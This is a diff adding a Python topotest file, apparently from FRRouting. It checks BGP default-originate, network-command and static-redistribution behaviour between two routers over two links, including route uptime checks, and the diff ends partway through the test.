+# Shreenidhi A R <rshreenidhi@vmware.com>
+# THE SOFTWARE IS PROVIDED "AS IS" AND VMWARE DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL VMWARE BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
+# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
+# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
+# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
+# OF THIS SOFTWARE.
+#
+"""
+Following tests are covered.
+1. Verify default-originate route with default static and network command
+2. Verify default-originate route with aggregate summary command
+"""
+import os
+import sys
+import time
+import pytest
+import datetime
+from copy import deepcopy
+from lib.topolog import logger
+
+# pylint: disable=C0413
+# Import topogen and topotest helpers
+from lib.topogen import Topogen, get_topogen
+from lib.topojson import build_config_from_json
+from lib.topolog import logger
+
+from lib.bgp import (
+ verify_bgp_convergence,
+ create_router_bgp,
+ verify_bgp_rib,
+ get_dut_as_number,
+ verify_rib_default_route,
+ verify_fib_default_route,
+)
+from lib.common_config import (
+ verify_fib_routes,
+ step,
+ run_frr_cmd,
+ get_frr_ipv6_linklocal,
+ start_topology,
+ apply_raw_config,
+ write_test_header,
+ check_address_types,
+ write_test_footer,
+ reset_config_on_routers,
+ create_static_routes,
+ check_router_status,
+)
+
+# Save the Current Working Directory to find configuration files.
+CWD = os.path.dirname(os.path.realpath(__file__))
+sys.path.append(os.path.join(CWD, "../"))
+sys.path.append(os.path.join(CWD, "../lib/"))
+
+# Required to instantiate the topology builder class.
+
+# pylint: disable=C0413
+# Import topogen and topotest helpers
+
+# Global variables
+topo = None
+NETWORK1_1 = {"ipv4": "198.51.1.1/32", "ipv6": "2001:DB8::1:1/128"}
+NETWORK1_2 = {"ipv4": "198.51.1.2/32", "ipv6": "2001:DB8::1:2/128"}
+NETWORK1_3 = {"ipv4": "198.51.1.3/32", "ipv6": "2001:DB8::1:3/128"}
+NETWORK1_4 = {"ipv4": "198.51.1.4/32", "ipv6": "2001:DB8::1:4/128"}
+NETWORK1_5 = {"ipv4": "198.51.1.5/32", "ipv6": "2001:DB8::1:5/128"}
+
+ipv4_uptime_dict = {
+ "r2": {
+ "static_routes": [
+ {"network": "0.0.0.0/0"},
+ ]
+ }
+}
+
+ipv6_uptime_dict = {
+ "r2": {
+ "static_routes": [
+ {"network": "::/0"},
+ ]
+ }
+}
+
+DEFAULT_ROUTES = {"ipv4": "0.0.0.0/0", "ipv6": "0::0/0"}
+NEXT_HOP_IP = {"ipv4": "Null0", "ipv6": "Null0"}
+
+pytestmark = [pytest.mark.bgpd]
+
+
+def setup_module(mod):
+ """
+ Sets up the pytest environment
+
+ * `mod`: module name
+ """
+ testsuite_run_time = time.asctime(time.localtime(time.time()))
+ logger.info("Testsuite start time: {}".format(testsuite_run_time))
+ logger.info("=" * 40)
+
+ logger.info("Running setup_module to create topology")
+
+ # This function initiates the topology build with Topogen...
+ json_file = "{}/bgp_default_originate_2links.json".format(CWD)
+ tgen = Topogen(json_file, mod.__name__)
+ global topo
+ topo = tgen.json_topo
+ # ... and here it calls Mininet initialization functions.
+
+ # Starting topology, create tmp files which are loaded to routers
+ # to start daemons and then start routers
+ start_topology(tgen)
+
+ # Creating configuration from JSON
+ build_config_from_json(tgen, topo)
+
+ global ADDR_TYPES
+ global BGP_CONVERGENCE
+ global DEFAULT_ROUTES
+ global DEFAULT_ROUTE_NXT_HOP_LINK1, DEFAULT_ROUTE_NXT_HOP_LINK2
+ ADDR_TYPES = check_address_types()
+ BGP_CONVERGENCE = verify_bgp_convergence(tgen, topo)
+ assert BGP_CONVERGENCE is True, "setup_module :Failed \n Error: {}".format(
+ BGP_CONVERGENCE
+ )
+
+ DEFAULT_ROUTES = {"ipv4": "0.0.0.0/0", "ipv6": "0::0/0"}
+
+ interface = topo["routers"]["r1"]["links"]["r2-link1"]["interface"]
+ ipv6_link_local = get_frr_ipv6_linklocal(tgen, "r1", intf=interface)
+ ipv4_nxt_hop = topo["routers"]["r1"]["links"]["r2-link1"]["ipv4"].split("/")[0]
+ ipv6_nxt_hop = topo["routers"]["r1"]["links"]["r2-link1"]["ipv6"].split("/")[0]
+ DEFAULT_ROUTE_NXT_HOP_LINK1 = {"ipv4": ipv4_nxt_hop, "ipv6": ipv6_link_local}
+
+ interface = topo["routers"]["r1"]["links"]["r2-link2"]["interface"]
+ ipv6_link_local = get_frr_ipv6_linklocal(tgen, "r1", intf=interface)
+ ipv4_nxt_hop = topo["routers"]["r1"]["links"]["r2-link2"]["ipv4"].split("/")[0]
+ ipv6_nxt_hop = topo["routers"]["r1"]["links"]["r2-link2"]["ipv6"].split("/")[0]
+ DEFAULT_ROUTE_NXT_HOP_LINK2 = {"ipv4": ipv4_nxt_hop, "ipv6": ipv6_link_local}
+ logger.info("Running setup_module() done")
+
+
+def teardown_module():
+ """Teardown the pytest environment"""
+
+ logger.info("Running teardown_module to delete topology")
+
+ tgen = get_topogen()
+
+ # Stop toplogy and Remove tmp files
+ tgen.stop_topology()
+
+ logger.info(
+ "Testsuite end time: {}".format(time.asctime(time.localtime(time.time())))
+ )
+ logger.info("=" * 40)
+
+
+#####################################################
+#
+# Local API's
+#
+#####################################################
+
+
+def get_rib_route_uptime(tgen, addr_type, dut, input_dict):
+ """
+ Verify route uptime in RIB using "show ip route"
+
+ Parameters
+ ----------
+ * `tgen` : topogen object
+ * `addr_type` : ip type, ipv4/ipv6
+ * `dut`: Device Under Test, for which user wants to test the data
+ * `input_dict` : input dict, has details of static routes
+ * `route_uptime`: uptime of the routes
+
+ Usage
+ -----
+ # Creating static routes for r1
+ input_dict_r1 = {
+ "r1": {
+ "static_routes": [
+ {
+ "network": "147.10.13.4/32"
+ },
+ {
+ "network": "147.10.12.0/24"
+ },
+ {
+ "network": "147.10.13.4/32"
+ },
+ {
+ "network": "147.10.13.4/32"
+ },
+ {
+ "network": "147.10.13.4/32"
+ }
+ ]
+ }
+ }
+
+
+ Returns
+ -------
+ errormsg(str) or True
+ """
+
+ logger.info("Entering lib API: get_rib_route_uptime()")
+ route_time = []
+ out_route_dict = {}
+ router_list = tgen.routers()
+ for routerInput in input_dict.keys():
+ for router, rnode in router_list.items():
+ if router != dut:
+ continue
+
+ logger.info("Checking router %s RIB:", router)
+
+ # Verifying RIB routes
+ if addr_type == "ipv4":
+ command = "show ip route"
+ else:
+ command = "show ipv6 route"
+
+ if "static_routes" in input_dict[routerInput]:
+ static_routes = input_dict[routerInput]["static_routes"]
+
+ for static_route in static_routes:
+ if "vrf" in static_route and static_route["vrf"] is not None:
+
+ logger.info(
+ "[DUT: {}]: Verifying routes for VRF:"
+ " {}".format(router, static_route["vrf"])
+ )
+ cmd = "{} vrf {}".format(command, static_route["vrf"])
+
+ else:
+ cmd = "{}".format(command)
+
+ cmd = "{} json".format(cmd)
+
+ rib_routes_json = run_frr_cmd(rnode, cmd, isjson=True)
+
+ if bool(rib_routes_json) is False:
+ errormsg = "No route found in rib of router {}..".format(router)
+ return errormsg
+ network = static_route["network"]
+ route_time.append(rib_routes_json[network][0]["uptime"])
+
+ logger.info("Exiting lib API: get_rib_route_uptime()")
+ return route_time
+
+
+def verify_the_uptime(time_stamp_before, time_stamp_after, incremented=None):
+ """
+ time_stamp_before : string the time stamp captured
+ time_stamp_after : string the time stamp captured
+ """
+ uptime_before = datetime.datetime.strptime(time_stamp_before[0], "%H:%M:%S")
+ uptime_after = datetime.datetime.strptime(time_stamp_after[0], "%H:%M:%S")
+
+ if incremented == True:
+ if uptime_before < uptime_after:
+ logger.info(
+ " The Uptime [{}] is incremented than [{}].......PASSED ".format(
+ time_stamp_before, time_stamp_after
+ )
+ )
+ return True
+ else:
+ logger.error(
+ " The Uptime [{}] is expected to be incremented than [{}].......FAILED ".format(
+ time_stamp_before, time_stamp_after
+ )
+ )
+ return False
+ else:
+ logger.info(
+ " The Uptime [{}] is not incremented than [{}] ".format(
+ time_stamp_before, time_stamp_after
+ )
+ )
+ return True
+
+
+#####################################################
+#
+# Testcases
+#
+#####################################################
+
+
+def test_verify_bgp_default_originate_with_default_static_route_p1(request):
+ """
+ Summary: "Verify default-originate route with default static and network command "
+
+ """
+ tgen = get_topogen()
+ global BGP_CONVERGENCE, DEFAULT_ROUTE_NXT_HOP_LINK1, DEFAULT_ROUTE_NXT_HOP_LINK2, DEFAULT_ROUTES
+
+ if BGP_CONVERGENCE != True:
+ pytest.skip("skipped because of BGP Convergence failure")
+ # test case name
+ tc_name = request.node.name
+ write_test_header(tc_name)
+ if tgen.routers_have_failure():
+ check_router_status(tgen)
+ reset_config_on_routers(tgen)
+
+ step("Configure 2 link between R1 and R2")
+ step("Configure IPV4 and IPV6 EBGP between R1 and R2 both the links")
+ step("Configure default-originate on R1 IPv4 and IPv6 BGP session link-1 only ")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {"r2": {"dest-link": "r1-link1"}}
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {"r2": {"dest-link": "r1-link1"}}
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("Verify IPv4/IPv6 default originate routes present on R2 nexthop as link-1")
+ for addr_type in ADDR_TYPES:
+ static_routes_input = {
+ "r2": {
+ "static_routes": [
+ {
+ "network": [DEFAULT_ROUTES[addr_type]],
+ "next_hop": DEFAULT_ROUTE_NXT_HOP_LINK1[addr_type],
+ }
+ ]
+ }
+ }
+
+ result = verify_fib_routes(
+ tgen,
+ addr_type,
+ "r2",
+ static_routes_input,
+ next_hop=DEFAULT_ROUTE_NXT_HOP_LINK1[addr_type],
+ )
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(
+ tc_name, result
+ )
+
+ result = verify_bgp_rib(
+ tgen,
+ addr_type,
+ "r2",
+ static_routes_input,
+ next_hop=DEFAULT_ROUTE_NXT_HOP_LINK1[addr_type],
+ )
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(
+ tc_name, result
+ )
+
+ step(
+ "Configure network command on R1 (0.0.0.0/0 and 0::0/0) for IPv4 and IPv6 address family "
+ )
+ DEFAULT_ROUTES = {"ipv4": "0.0.0.0/0", "ipv6": "0::0/0"}
+ for addr_type in ADDR_TYPES:
+ input_advertise = {
+ "r1": {
+ "bgp": {
+ "address_family": {
+ addr_type: {
+ "unicast": {
+ "advertise_networks": [
+ {"network": [DEFAULT_ROUTES[addr_type]]}
+ ]
+ }
+ }
+ }
+ }
+ }
+ }
+
+ result = create_router_bgp(tgen, topo, input_advertise)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(
+ tc_name, result
+ )
+
+ step("No change on IPv4/IPv6 default-originate route advertised from link1")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("verify 0.0.0.0/0 and 0::0/0 route also get advertised from link-2 ")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step(
+ "Before removing default originate from R1 link -1 IPv4 and IPv6 address family taking the uptime snapshot"
+ )
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("Remove default originate from R1 link -1 IPv4 and IPv6 address family ")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {
+ "r2": {"dest-link": "r1-link1", "delete": True}
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {
+ "r2": {"dest-link": "r1-link1", "delete": True}
+ }
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("Routes must be learned from network command")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("After removing the default originate on R1 taking the uptime snapshot")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ "After removing the default-originate uptime should get reset for link-1 learn route"
+ )
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot before configuring default - originate")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ "Configure default-originate on R1 link-1 again for IPv4 and IPv6 address family"
+ )
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {
+ "r2": {
+ "dest-link": "r1-link1",
+ }
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {
+ "r2": {
+ "dest-link": "r1-link1",
+ }
+ }
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("Verify No change on R2 routing and BGP table for both the links ")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking snapshot after configuring default - originate")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ "After configuring the default-originate uptime should not get reset for link-1 learn route"
+ )
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=True)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=True)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot before removing network 0.0.0.0 ")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("Remove network command from R1 IPv4/IPv6 address family ")
+ DEFAULT_ROUTES = {"ipv4": "0.0.0.0/0", "ipv6": "0::0/0"}
+ for addr_type in ADDR_TYPES:
+ input_advertise = {
+ "r1": {
+ "bgp": {
+ "address_family": {
+ addr_type: {
+ "unicast": {
+ "advertise_networks": [
+ {
+ "network": [DEFAULT_ROUTES[addr_type]],
+ "delete": True,
+ }
+ ]
+ }
+ }
+ }
+ }
+ }
+ }
+
+ result = create_router_bgp(tgen, topo, input_advertise)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(
+ tc_name, result
+ )
+
+ step(
+ "Verify 0.0.0.0/0 and 0::0/0 route get removed from link-2 and default-originate IPv4/IPv6 route learn on link-1"
+ )
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert (
+ result is not True
+ ), "Testcase {} : Failed \n Route from link2 is not expected \n Error: {}".format(
+ tc_name, result
+ )
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert (
+ result is not True
+ ), "Testcase {} : Failed\n Route from link2 is not expected \n Error: {}".format(
+ tc_name, result
+ )
+
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ "After removing default originate command on R1 verify that the uptime got reset on R2"
+ )
+
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot before configuring static route network")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ "Configure static default route for IPv4 and IPv6 (0.0.0.0/0 next-hop Null0 and 0::0/0 next-hop Null0) on R1"
+ )
+ static_routes_input = {
+ "r1": {
+ "static_routes": [
+ {
+ "network": "0.0.0.0/0",
+ "next_hop": NEXT_HOP_IP["ipv4"],
+ },
+ {
+ "network": "0::0/0",
+ "next_hop": NEXT_HOP_IP["ipv6"],
+ },
+ ]
+ }
+ }
+ result = create_static_routes(tgen, static_routes_input)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("verifyIPv4 and IPv6 static routes are configure and up on R1 ")
+ for addr_type in ADDR_TYPES:
+ static_routes_input = {
+ "r1": {
+ "static_routes": [
+ {
+ "network": "0.0.0.0/0",
+ "next_hop": NEXT_HOP_IP["ipv4"],
+ },
+ {
+ "network": "0::0/0",
+ "next_hop": NEXT_HOP_IP["ipv6"],
+ },
+ ]
+ }
+ }
+ result = verify_fib_routes(tgen, addr_type, "r1", static_routes_input)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(
+ tc_name, result
+ )
+
+ step("Configure redistribute static on IPv4 and IPv6 address family")
+ redistribute_static = {
+ "r1": {
+ "bgp": {
+ "address_family": {
+ "ipv4": {"unicast": {"redistribute": [{"redist_type": "static"}]}},
+ "ipv6": {"unicast": {"redistribute": [{"redist_type": "static"}]}},
+ }
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, redistribute_static)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("Verify No change on IPv4/IPv6 default-originate route advertised from link1")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("verify 0.0.0.0/0 and 0::0/0 route also get advertised from link-2 ")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert (
+ result is not True
+ ), "Testcase {} : Failed\n Best Path sould be advertised in routes\n Error: {}".format(
+ tc_name, result
+ )
+
+ step("Taking uptime snapshot before removing default originate")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("Remove default-originate from link-1 from IPv4 and IPv6 neighbor ")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {
+ "r2": {"dest-link": "r1-link1", "delete": True}
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {
+ "r2": {"dest-link": "r1-link1", "delete": True}
+ }
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot after removing default originate")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("verify the up time , up time should get reset ")
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Verify No change on IPv4/IPv6 default-originate route advertised from link1")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot before configuring default originate")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ " Configure default-originate on link-1 again for IPv4 and IPv6 address family"
+ )
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {
+ "r2": {
+ "dest-link": "r1-link1",
+ }
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {
+ "r2": {
+ "dest-link": "r1-link1",
+ }
+ }
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("Verify No change on IPv4/IPv6 default-originate route advertised from link1")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert result is not True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot after configuring default originate")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("After configuring the default originate the uptime should not get reset ")
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot before removing redisctribute static ")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("Remove redistribute static from IPv4 and IPv6 address family ")
+ input_dict_1 = {
+ "r1": {
+ "bgp": {
+ "local_as": get_dut_as_number(tgen, dut="r1"),
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "redistribute": [{"redist_type": "static", "delete": True}]
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "redistribute": [{"redist_type": "static", "delete": True}]
+ }
+ },
+ },
+ }
+ }
+ }
+
+ result = create_router_bgp(tgen, topo, input_dict_1)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
+
